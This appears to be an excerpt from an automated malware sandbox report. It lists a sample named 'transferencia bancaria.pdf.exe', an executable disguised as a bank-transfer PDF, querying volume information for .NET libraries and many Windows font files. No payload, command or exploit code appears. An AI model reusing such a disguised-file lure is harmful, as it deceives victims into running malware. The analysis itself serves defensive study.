                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Users\user\Desktop\transferencia bancaria.pdf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
